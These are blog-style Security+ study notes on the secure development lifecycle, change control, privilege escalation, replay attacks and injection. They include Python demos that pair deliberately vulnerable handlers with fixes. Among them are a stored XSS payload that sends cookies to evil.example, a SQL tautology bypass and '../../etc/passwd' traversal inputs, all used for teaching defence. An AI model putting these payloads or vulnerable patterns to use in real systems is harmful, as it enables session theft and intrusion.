Sec+ preparation #6

Intro
Let's jump into the next day of preparing for Security+.
Before beginning I just want to give credit to Master OTW at Hackers-Arise. I really enjoy how he describes the various topics. A real professional.
You can purchase the Security+ SY0-701 boot camp here
Metasploit
- One of the best-known exploitation frameworks
Security Audits
There can be:
Internal audits
- Your own people may be reluctant to find (or report) problems in their own work.
External audits
Independent third-party audits
- This one is the most effective, because the auditor has no stake in the result.
Vulnerability Life Cycle (will be in exam)
Identification → Analysis → Response and Remediation → Validation of Remediation → Reporting
After this cycle you do it again.
This is not a one-time process but one that you run continuously. (will be in exam)
Application Security
Applications need to be secure. The web is a broad attack surface, so there has to be some kind of security layer around your application, not just a firewall in front of it.
OWASP (the Open Worldwide Application Security Project, formerly the Open Web Application Security Project)
If you need experience for a job, you can volunteer on OWASP projects.
They do really good things.
It's a non-profit organization.
All materials are available for FREE.
They developed many tools, such as OWASP ZAP.
The OWASP Top 10 is important in the cybersecurity field.
Protecting Data on Devices
Hierarchical Storage Management (HSM)
Moves data to low-cost devices for long-term storage.
May need to encrypt the data to protect it.
- You should encrypt the data!!!
Also called tiered storage.
(Do not confuse this with the other HSM, the Hardware Security Module, which stores and protects cryptographic keys.)
USB Encryption
Full hard drive encryption
Data encryption
It's the last layer of protection: it still protects the data when every other control has failed.
Full disk encryption
- If you lose the device, you don't expose the data (at rest; a running, unlocked device still has the key in memory)
Database
- Encrypted tables or records for sensitive data
Individual Files
- Software for this: PGP/GnuPG, AxCrypt
Removable Media
- Easy to lose, small in size, and often holding data in clear text
Mobile Devices
- Large amount of storage, may contain business data.
Software Security Downfalls
Most attacks take advantage of a weakness (a vulnerability).
Practically all software (99%) has vulnerabilities. They're everywhere.
The more complex the software, the more vulnerabilities it has.
Software is changing faster than software security.
Businesses make money when they release new versions. New versions mean new code, and new code means new vulnerabilities.
Software Security Challenges
Security is not treated as crucial during the development stages
Many programmers do not practice secure coding
Focus is on functionality and not security
Fuzzing, also known as fuzz testing, is a software testing technique that feeds a program random or invalid inputs to uncover bugs, security vulnerabilities, and crashes.
- Responsible companies do that before release
Software Development Methods
Project Development (will be in exam)
Security within software development:
Security should be planned from the first step.
- The initiation of the project is the best time. Remember this.
Everyone has to follow security policies, from the junior developer to the CEO.
Security controls should not be bolted on after the fact.
Types of development methods:
Waterfall (will be in exam)
Traditional model
Completion of one phase leads to the start of the next; there is no going back to an earlier phase
Suited to long-term projects with stable requirements
Agile (will be in exam)
Heavy interaction with stakeholders
Evolutionary software development
Multiple software releases.
It's an iteration-based method; each iteration runs through:
Plan
Design
Develop
Test
Deploy
Review
It's the most popular method today.
Software development life cycle (SDLC)
Different models with similar processes:
Project initiation (security should come in at this stage, but it is usually skipped. This is always asked in the exam: the first step is security. Remember it.)
Identify security requirements
Perform an initial risk analysis
Analyze threats
Estimate costs and benefits per countermeasure
Determine the service level agreement (SLA)
Functional design analysis and planning
Define security requirements
Propose security checkpoints in the plan
Preliminary security test plans
Formal functional baseline includes security requirements
System design specifications
Define security specifications
Update test plans
Security specifications
Software development
Write programming code to meet the specifications
Implement security within the code
Unit tests
Installation/Test/Implementation
Test system components
User acceptance testing
Install the system
Create manuals
Accept the system
Operational/Maintenance
Maintain the system through the service level agreement (SLA)
After changes, re-certify
Audit and test security components periodically
- Must be done continuously
Disposal
Properly dispose of the system
Repeat the full cycle with a new initiation
Data is moved to another system (or securely destroyed)
You must follow best practices where they are defined, whatever industry you're in. You must follow best practices! If you can show that you did everything according to your industry's best practices, you have demonstrated due care and are in a far safer position.
Verification vs. Validation
Verification
- Determining if the product accurately matches the developer's description and specifications ("did we build the product right?")
- Follows the structure and logic of the product
Validation
- Determining the degree to which the product meets its real-world use ("did we build the right product?")
Change Control (always in exam)
You must document changes to your system, and there has to be a process to manage them.
If you want to change something, you need to submit a request for permission and wait for approval.
It's a really important thing.
Without proper change control, a project can take longer than appropriate to complete.
Apps should be centrally managed
Security controls must always be protected (a change must not silently weaken or remove them)
Changes should be made in the development environment, tested, and only then promoted to production.
Procedures of change control
Request for change
Analyze the request
Develop the implementation strategy
Calculate the cost of the implementation
Review any security implications
Record the change request
Submit the change request for approval
Develop the change
Re-code segments of the product, modify its functionality
Link these changes in the code to the formal request
Submit the software for testing and QA
Repeat until quality is adequate
Make version changes
Report changes to management
Establish a baseline setting
Privilege Escalation
A user should get the minimum privilege needed to do the job. Not more than they need.
It's an important aspect. You can
Vertical privilege escalation
Privilege elevation
- A lower-privileged user accesses functions or content reserved for higher-privileged users (e.g. a normal user reaching admin functions).
Horizontal privilege escalation
- A user accesses the data or functions of another user at the same privilege level, for example a developer account reading HR's records, because HR has lots of info.
Privilege de-escalation:
- A highly privileged user downgrades their access to use normal user functions (e.g. an admin doing day-to-day work from a standard account)
Always give the least amount of privilege to applications, users, and processes.
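To make the two directions concrete, here is an added example (my own, not from the course or these notes) of a toy record service. The users, roles and HR records are constructed; the vulnerable handlers trust the request, the hardened ones enforce an ownership check (against horizontal escalation) and a role check (against vertical escalation).

```python
# Added example, not from the original notes: a toy record service showing
# vertical and horizontal privilege escalation and the checks that stop them.
# Users, roles and records are constructed for illustration.
from dataclasses import dataclass


@dataclass(frozen=True)
class User:
    name: str
    role: str  # "user" or "admin"


# Constructed sample data: HR records, each owned by one employee.
RECORDS = {
    101: {"owner": "alice", "salary": 70000},
    102: {"owner": "bob", "salary": 65000},
}


class Forbidden(Exception):
    """Raised when a caller lacks the privilege for the requested action."""


# --- vulnerable handlers: they act on the request without asking who sent it ---

def get_record_vulnerable(user: User, record_id: int) -> dict:
    # Horizontal escalation: bob reads alice's record just by changing the id.
    return RECORDS[record_id]


def delete_user_vulnerable(user: User, target: str) -> str:
    # Vertical escalation: a plain user reaches an admin-only function.
    return f"deleted {target}"


# --- hardened handlers: least privilege is enforced on every call ---

def get_record(user: User, record_id: int) -> dict:
    rec = RECORDS[record_id]
    # Ownership check blocks horizontal escalation; admins may read any record.
    if rec["owner"] != user.name and user.role != "admin":
        raise Forbidden(f"{user.name} may not read record {record_id}")
    return rec


def delete_user(user: User, target: str) -> str:
    # Role check blocks vertical escalation.
    if user.role != "admin":
        raise Forbidden(f"{user.name} is not an admin")
    return f"deleted {target}"


def _succeeds(fn, *args) -> bool:
    """True if the call went through, False if the handler refused it."""
    try:
        fn(*args)
        return True
    except Forbidden:
        return False


def escalation_attempts() -> dict:
    """Replay the same abusive requests against both handler versions."""
    bob = User("bob", "user")            # ordinary employee
    root = User("root", "admin")         # legitimate administrator
    return {
        # bob asks for alice's record (same privilege level, different owner)
        "horizontal_vulnerable": _succeeds(get_record_vulnerable, bob, 101),
        "horizontal_hardened": _succeeds(get_record, bob, 101),
        # bob calls an admin-only action
        "vertical_vulnerable": _succeeds(delete_user_vulnerable, bob, "alice"),
        "vertical_hardened": _succeeds(delete_user, bob, "alice"),
        # legitimate use still works after hardening
        "own_record_hardened": _succeeds(get_record, bob, 102),
        "admin_delete_hardened": _succeeds(delete_user, root, "bob"),
    }


if __name__ == "__main__":
    for name, ok in escalation_attempts().items():
        print(f"{name:24s} {'allowed' if ok else 'blocked'}")
```

The point of the hardened version is that every handler re-checks the caller: the framework's "is logged in" check alone says nothing about whether this user may touch this record or this function.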
Practice exam
There's a good source of practice exams:
Boson - a practice exam costs $99
Denial of Service (DoS)
Basically it is a resource exhaustion attack.
Exploits some form of weakness or limitation:
Sending a large amount of data
SYN flooding
Mail bomb
ICMP smurf attack
Driving a processor to 100% load
Distributed Denial of Service (DDoS)
Many devices performing DoS at the same time, usually a botnet.
One master (the command-and-control) directs them all
Some of the botnets today have over 1 million hosts
Replay attacks
Related to the man-in-the-middle attack (MITM): the attacker captures traffic and later resends it.
Could be credentials that have been captured
Username and passwords
Security token
Could be against cryptographic tools
Digital signature
Wireless connections go over the air. They can be captured and replayed. This is where SDR (software-defined radio) steps in.
A wired connection is safer, because capturing it requires access to the physical medium.
- An unsecured cookie can reveal credentials or a session
Replay Attacks Protection
Update software with the latest security patches (most important)
Use encryption, digital signatures, or a VPN, TLS (SSL), SSH
Use timestamps (and one-time nonces), so a captured message is rejected when it is resent
Secure network entry points
- Disable unused ports
Monitor the network for suspicious activity
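The timestamp defence is easiest to see in code. The following is an added example of my own, not from the course: a sender attaches a timestamp, a random nonce and an HMAC to each message, and the receiver rejects anything tampered with, stale, or already seen. The shared key, the 30-second freshness window and the "transfer" payload are all assumptions made for the demo.

```python
# Added example, not from the original notes: a message authentication scheme
# with a timestamp and a one-time nonce, and a receiver that rejects replays.
# The shared key, the freshness window and the sample payload are assumptions.
import hashlib
import hmac
import json
import secrets
import time
from typing import Optional, Tuple

SHARED_KEY = b"constructed-shared-key-for-demo"   # assumption: pre-shared by both sides
FRESHNESS_WINDOW = 30                              # seconds a message stays acceptable


def _canonical(msg: dict) -> bytes:
    """Serialise deterministically so sender and receiver MAC the same bytes."""
    return json.dumps(msg, sort_keys=True, separators=(",", ":")).encode()


def sign_message(payload: dict, key: bytes = SHARED_KEY,
                 now: Optional[float] = None) -> dict:
    """Sender side: attach a timestamp, a random nonce and an HMAC over all fields."""
    msg = dict(payload)
    msg["ts"] = int(time.time() if now is None else now)
    msg["nonce"] = secrets.token_hex(16)
    msg["mac"] = hmac.new(key, _canonical(msg), hashlib.sha256).hexdigest()
    return msg


class ReplayGuard:
    """Receiver side: verify the MAC, then freshness, then nonce uniqueness."""

    def __init__(self, key: bytes = SHARED_KEY, window: int = FRESHNESS_WINDOW):
        self.key = key
        self.window = window
        self.seen = {}          # nonce -> timestamp, pruned once outside the window

    def verify(self, msg: dict, now: Optional[float] = None) -> Tuple[bool, str]:
        now = time.time() if now is None else now
        body = dict(msg)
        mac = body.pop("mac", "")
        expected = hmac.new(self.key, _canonical(body), hashlib.sha256).hexdigest()
        if not hmac.compare_digest(mac, expected):
            return False, "bad mac"          # tampered with or forged
        if abs(now - body.get("ts", 0)) > self.window:
            return False, "stale"            # too old (or clock skew too large)
        # Forget nonces that can no longer pass the freshness check anyway.
        self.seen = {n: t for n, t in self.seen.items() if now - t <= self.window}
        nonce = body.get("nonce")
        if nonce in self.seen:
            return False, "replay"           # exact same message delivered before
        self.seen[nonce] = body["ts"]
        return True, "ok"


def replay_demo() -> dict:
    """Constructed scenario: a captured 'transfer' is replayed and tampered with."""
    t0 = 1_700_000_000                      # fixed clock so the demo is deterministic
    guard = ReplayGuard()
    original = sign_message({"action": "transfer", "amount": 100, "to": "mallory"}, now=t0)

    tampered = dict(original)
    tampered["amount"] = 10_000             # MAC no longer matches

    return {
        "first_delivery": guard.verify(original, now=t0 + 1)[1],
        "replayed_10s_later": guard.verify(original, now=t0 + 10)[1],
        "tampered_amount": guard.verify(tampered, now=t0 + 2)[1],
        "replayed_after_window": guard.verify(original, now=t0 + FRESHNESS_WINDOW + 5)[1],
    }


if __name__ == "__main__":
    for case, verdict in replay_demo().items():
        print(f"{case:24s} {verdict}")
```

The order of the checks matters: the MAC is verified first, so an attacker cannot probe the nonce cache or the clock with forged messages, and the nonce cache only has to remember values from inside the freshness window.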
Application attacks
Cross-site scripting (XSS; written XSS rather than CSS to avoid confusion with Cascading Style Sheets)
SQL injection
LDAP injection
XML injection (XML is a markup language used to transfer data)
Directory traversal / command injection (these are the easiest)
Buffer overflow
Input Validation to prevent attacks
It checks that what is sent to the system is legitimate: the expected type, length, format and range.
Make sure that input validation is set up, on the server side; client-side checks alone can be bypassed.
Fuzzing
It helps to check whether input validation is set up correctly.
It feeds random or malformed data into inputs and watches for crashes and unexpected behaviour.
OWASP offers tools for fuzzing (OWASP ZAP, for example, has a built-in fuzzer).
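Fuzzing came up twice above (under software security challenges and here), so one added example of my own, not from the course, covers both: a tiny mutation fuzzer pointed at a constructed "key=number;key=number" parser. The first parser trusts its input and the fuzzer quickly makes it throw; the validated parser returns None on bad input and never crashes. The record format, both parsers and the seed inputs are all constructed for the demo.

```python
# Added example, not from the original notes: a minimal mutation fuzzer aimed
# at an input parser, first without and then with proper input validation.
# The record format ("key=number;key=number") and both parsers are constructed.
import random
import string
from typing import Callable, Dict, Optional

# Seed inputs the fuzzer mutates; all constructed for the demo.
SEEDS = ["a=1;b=2", "user=42", "x=0"]
# Characters that tend to hit parser corner cases: delimiters, quotes, NUL, non-ASCII.
INTERESTING = "=;=;'\"\\\x00\n\r\t%\xff" + string.ascii_letters + string.digits


def parse_kv_unvalidated(data: str) -> Dict[str, int]:
    """Trusts its input: any surprise becomes an uncaught exception (a 'crash')."""
    out = {}
    for field in data.split(";"):
        key, value = field.split("=")     # ValueError unless exactly one '='
        out[key] = int(value)             # ValueError on anything non-numeric
    return out


def parse_kv_validated(data: str) -> Optional[Dict[str, int]]:
    """Validates before parsing: returns None for bad input, never raises."""
    if len(data) > 256:                   # bound the size before doing any work
        return None
    out = {}
    for field in data.split(";"):
        if field.count("=") != 1:
            return None
        key, value = field.split("=", 1)
        # Allowlist: identifier-style keys, plain ASCII digit values only.
        if not key.isidentifier() or not (value.isascii() and value.isdigit()):
            return None
        out[key] = int(value)
    return out


def mutate(s: str, rng: random.Random) -> str:
    """Apply one random mutation: insert, delete, duplicate, or flood."""
    op = rng.randrange(4)
    pos = rng.randrange(len(s) + 1)
    if op == 0:                                   # insert an interesting char
        return s[:pos] + rng.choice(INTERESTING) + s[pos:]
    if op == 1 and s:                             # delete one char
        return s[:pos - 1] + s[pos:] if pos else s[1:]
    if op == 2:                                   # duplicate a tail chunk
        return s + s[rng.randrange(len(s) + 1):]
    return s[:pos] + rng.choice(INTERESTING) * rng.randrange(1, 600) + s[pos:]


def fuzz(target: Callable[[str], object], iterations: int = 2000,
         seed: int = 1) -> Dict[str, str]:
    """Run mutated inputs through target; map each distinct crash to one input."""
    rng = random.Random(seed)             # fixed seed: reproducible findings
    crashes: Dict[str, str] = {}
    for _ in range(iterations):
        candidate = mutate(rng.choice(SEEDS), rng)
        try:
            target(candidate)
        except Exception as exc:          # any exception escaping = crash
            crashes.setdefault(type(exc).__name__, candidate)
    return crashes


if __name__ == "__main__":
    print("unvalidated:", fuzz(parse_kv_unvalidated))
    print("validated:  ", fuzz(parse_kv_validated))
```

Real fuzzers (AFL, libFuzzer, ZAP's fuzzer) add coverage feedback and far better mutation strategies, but the loop is the same: mutate, run, record anything that escapes as a finding.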
Cross Site Scripting
The attacker puts a script into a web page, and other users' browsers then execute it.
Input validation and output encoding defend against XSS
It can lead to:
SQL Injection
DNS redirect
DoS
Cookie hijack
Remote shell
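To show what "put a script into a web page" looks like and how output encoding stops it, here is an added example of my own (not from the course): one comment-rendering function that concatenates untrusted input into HTML and one that encodes it for its context. The template, the comment payloads and the evil.example host are constructed.

```python
# Added example, not from the original notes: the same comment rendered with
# string concatenation (vulnerable) and with context-aware HTML encoding.
# The page template, the comment and the cookie-stealing payload are constructed.
import html

# Constructed attacker input: a stored XSS payload that exfiltrates the session cookie.
PAYLOAD = '<script>fetch("https://evil.example/?c=" + document.cookie)</script>'
# Same idea aimed at an attribute context: it breaks out of the quotes instead.
ATTR_PAYLOAD = '" onmouseover="alert(document.cookie)'


def render_comment_vulnerable(author: str, text: str) -> str:
    """Interpolates untrusted input straight into HTML."""
    return (f'<div class="comment" data-author="{author}">'
            f'<p>{text}</p></div>')


def render_comment_safe(author: str, text: str) -> str:
    """Encodes for each context: text between tags and a quoted attribute value."""
    return (f'<div class="comment" data-author="{html.escape(author, quote=True)}">'
            f'<p>{html.escape(text)}</p></div>')


def browser_would_execute(markup: str) -> bool:
    """Rough stand-in for a browser: is there still a live <script> tag or an
    injected event-handler attribute in the markup?"""
    lowered = markup.lower()
    return "<script" in lowered or ' onmouseover="' in lowered


def xss_demo() -> dict:
    """Render both payloads through both renderers and see which survive."""
    return {
        "body_vulnerable": browser_would_execute(render_comment_vulnerable("mallory", PAYLOAD)),
        "body_safe": browser_would_execute(render_comment_safe("mallory", PAYLOAD)),
        "attr_vulnerable": browser_would_execute(render_comment_vulnerable(ATTR_PAYLOAD, "hi")),
        "attr_safe": browser_would_execute(render_comment_safe(ATTR_PAYLOAD, "hi")),
    }


if __name__ == "__main__":
    print(render_comment_vulnerable("mallory", PAYLOAD))
    print(render_comment_safe("mallory", PAYLOAD))
    print(xss_demo())
```

Two things worth noticing: the encoding is applied at output time, per context (element body versus attribute value), and input validation alone would not have helped here, because a comment legitimately may contain `<` or `"`. JavaScript and URL contexts need their own encoders; `html.escape` only covers HTML.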
Cross Site Request Forgery (CSRF)
Forces users to execute unwanted actions on a site where they are logged in
- Changing the user's password, address, email address
Social engineering is usually needed (the victim has to visit the attacker's page or click a link)
Can compromise data
The forged request inherits the identity and privileges of the victim, because the browser sends the victim's session cookie automatically
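The standard defence is a per-session token that the attacker's page cannot read, backed by an Origin header check. The following is an added example of my own, not from the course: a "change email" handler tried with a legitimate form post and with a forged cross-site post. The session store, the request dicts and the bank.example site are constructed for the demo.

```python
# Added example, not from the original notes: a synchronizer-token defence
# for a state-changing form, plus an Origin check as a second layer.
# The session store, request dicts and site origin are constructed.
import secrets
from typing import Dict, Tuple

SITE_ORIGIN = "https://bank.example"   # assumption: the legitimate site's origin

# Constructed server-side session store: session id -> session data.
SESSIONS: Dict[str, Dict[str, str]] = {}


def login(session_id: str, user: str) -> str:
    """Create a session and issue the per-session CSRF token its forms will embed."""
    SESSIONS[session_id] = {"user": user, "csrf": secrets.token_urlsafe(32)}
    return SESSIONS[session_id]["csrf"]


def change_email(request: Dict) -> Tuple[int, str]:
    """POST handler. The browser attaches the session cookie automatically, which
    is exactly what CSRF abuses; the token and the Origin are what it cannot forge."""
    session = SESSIONS.get(request["cookies"].get("session"))
    if session is None:
        return 401, "not logged in"
    origin = request["headers"].get("Origin")
    if origin is not None and origin != SITE_ORIGIN:
        return 403, "cross-site request blocked by Origin check"
    token = request["form"].get("csrf_token", "")
    # Constant-time compare on bytes, so odd input cannot raise or leak timing.
    if not secrets.compare_digest(token.encode(), session["csrf"].encode()):
        return 403, "missing or invalid CSRF token"
    session["email"] = request["form"]["email"]
    return 200, f"email for {session['user']} changed"


def csrf_demo() -> dict:
    """Victim is logged in; an attacker page auto-submits a form to bank.example."""
    token = login("sess-victim", "alice")
    legit = {
        "cookies": {"session": "sess-victim"},
        "headers": {"Origin": SITE_ORIGIN},
        "form": {"email": "alice@new.example", "csrf_token": token},
    }
    # Forged request: the victim's browser adds the cookie, but the attacker's
    # page can neither read the token nor present a matching Origin.
    forged = {
        "cookies": {"session": "sess-victim"},
        "headers": {"Origin": "https://evil.example"},
        "form": {"email": "attacker@evil.example"},
    }
    # Same forgery from a client that sends no Origin at all: the token still holds.
    forged_no_origin = {**forged, "headers": {}}
    return {
        "legit": change_email(legit)[0],
        "forged": change_email(forged)[0],
        "forged_no_origin": change_email(forged_no_origin)[0],
        "email_after": SESSIONS["sess-victim"].get("email"),
    }


if __name__ == "__main__":
    print(csrf_demo())
```

A `SameSite=Lax` or `Strict` attribute on the session cookie is a third layer that stops the browser from attaching the cookie to cross-site posts in the first place; the token check remains the one the handler itself can verify.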
Injection Attacks
Injection attacks are among the most popular attacks, so input validation (and, for SQL, parameterized queries) can save you a lot of trouble.
SQL Injection
LDAP Injection
XML Injection
Directory Traversal
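Two of the four are easy to show side by side. The following is an added example of my own, not from the course: a login query built by string concatenation next to its parameterised form, and a path-resolution check that stops directory traversal. The in-memory SQLite table, the single account and the temporary directory layout are all constructed for the demo.

```python
# Added example, not from the original notes: a login query built by string
# concatenation beside its parameterised form, and a path check that stops
# directory traversal. The database, the user and the file layout are constructed.
import os
import sqlite3
import tempfile


def make_db() -> sqlite3.Connection:
    """Constructed in-memory user table with one account."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (name TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('alice', 'correct horse')")
    return con


def login_vulnerable(con: sqlite3.Connection, name: str, password: str) -> bool:
    # Untrusted input becomes part of the SQL text itself.
    sql = f"SELECT 1 FROM users WHERE name = '{name}' AND password = '{password}'"
    return con.execute(sql).fetchone() is not None


def login_parameterised(con: sqlite3.Connection, name: str, password: str) -> bool:
    # Placeholders keep the input as data; the query structure cannot change.
    sql = "SELECT 1 FROM users WHERE name = ? AND password = ?"
    return con.execute(sql, (name, password)).fetchone() is not None


def sqli_demo() -> dict:
    con = make_db()
    bypass = "' OR '1'='1"                      # classic tautology payload
    return {
        "vulnerable_bypassed": login_vulnerable(con, "alice", bypass),
        "parameterised_bypassed": login_parameterised(con, "alice", bypass),
        "parameterised_real_login": login_parameterised(con, "alice", "correct horse"),
    }


def safe_path(base_dir: str, user_path: str) -> str:
    """Resolve user_path under base_dir; raise ValueError if it escapes."""
    base = os.path.realpath(base_dir)
    # realpath collapses '..' and symlinks, so the check sees the real target.
    target = os.path.realpath(os.path.join(base, user_path))
    if os.path.commonpath([base, target]) != base:
        raise ValueError(f"path escapes base directory: {user_path!r}")
    return target


def traversal_demo() -> dict:
    """Constructed requests against a temporary web root with one 'public' folder."""
    with tempfile.TemporaryDirectory() as base:
        os.makedirs(os.path.join(base, "public"))
        results = {}
        for req in ["public/index.html", "../../etc/passwd",
                    "public/../../x", "/etc/passwd"]:
            try:
                safe_path(base, req)
                results[req] = "allowed"
            except ValueError:
                results[req] = "blocked"
        return results


if __name__ == "__main__":
    print(sqli_demo())
    print(traversal_demo())
```

Note that `/etc/passwd` is blocked too: `os.path.join` discards the base when the user part is absolute, which is why the check is done on the resolved result rather than on the input string. Blocklisting `../` in the input would miss that case and URL-encoded variants.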
Additional info
It is really important to know the OWASP Top 10.
Written by Jonas Satkauskas